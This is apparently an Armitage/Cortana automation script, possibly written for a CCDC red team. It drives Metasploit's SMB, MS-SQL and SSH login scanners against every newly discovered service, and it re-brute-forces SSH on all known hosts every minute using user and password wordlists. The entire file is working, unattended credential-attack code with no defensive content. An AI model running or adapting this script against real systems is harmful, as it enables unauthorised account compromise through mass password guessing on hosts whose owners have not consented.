on service_add_445 {
	println("Bruteforcing new SMB service on $1");
	auxiliary("scanner/smb/smb_login", @($1), %(
		USER_FILE =>	"/root/ccdc_users.txt",
		PASS_FILE => 	"/root/ccdc_passwords.txt",
    USER_AS_PASS => "true",
    VERBOSE => "false",
    THREADS => "10",
    DB_ALL_USERS => "true",
    DB_ALL_PASS => "true",
  ));
}

on service_add_1433 {
	println("Bruteforcing new MS-SQL service on $1");
	auxiliary("scanner/mssql/mssql_login", @($1), %());
}

on service_add_22 {
	println("Bruteforcing new SSH service on $1");

	auxiliary("scanner/ssh/ssh_login", @($1), %(
      USER_FILE =>	"/root/ccdc_users.txt",
		PASS_FILE => 	"/root/ccdc_passwords.txt",
      USER_AS_PASS => "true",
      VERBOSE => "false",
      THREADS => "10",
      DB_ALL_USERS => "true",
      DB_ALL_PASS => "true",
	));
}

on heartbeat_1m {
   println("Bruteforcing SSH on all known hosts");

   auxiliary("scanner/ssh/ssh_login", service_open(22), %(
      USER_FILE =>   "/root/ccdc_users.txt",
      PASS_FILE =>   "/root/ccdc_passwords.txt",
      USER_AS_PASS => "true",
      VERBOSE => "false",
      THREADS => "10",
      DB_ALL_USERS => "false",
      DB_ALL_PASS => "false",
   ));
}

